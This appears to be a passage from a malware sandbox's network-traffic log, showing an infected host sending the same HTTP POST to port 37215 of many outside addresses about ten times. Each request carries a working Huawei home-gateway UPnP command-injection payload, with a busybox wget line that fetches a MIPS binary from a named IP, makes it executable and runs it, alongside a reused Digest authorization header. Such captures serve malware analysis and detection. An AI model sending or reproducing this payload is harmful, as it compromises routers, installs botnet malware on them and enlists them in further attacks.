                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            716192.168.2.1353394156.208.52.21237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.682610989 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            717192.168.2.1359854156.19.238.18137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.683936119 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            718192.168.2.135140441.164.51.037215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.685060978 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            719192.168.2.1342686156.141.138.4137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.686166048 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            720192.168.2.1356152156.149.203.6837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.687592030 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            721192.168.2.1342320197.58.68.3137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.688715935 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            722192.168.2.1355340197.81.221.637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.689784050 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            723192.168.2.1353244156.140.104.4637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.691059113 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            724192.168.2.135518641.65.34.7537215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.692312002 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            725192.168.2.1337908197.2.17.15937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.693449020 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
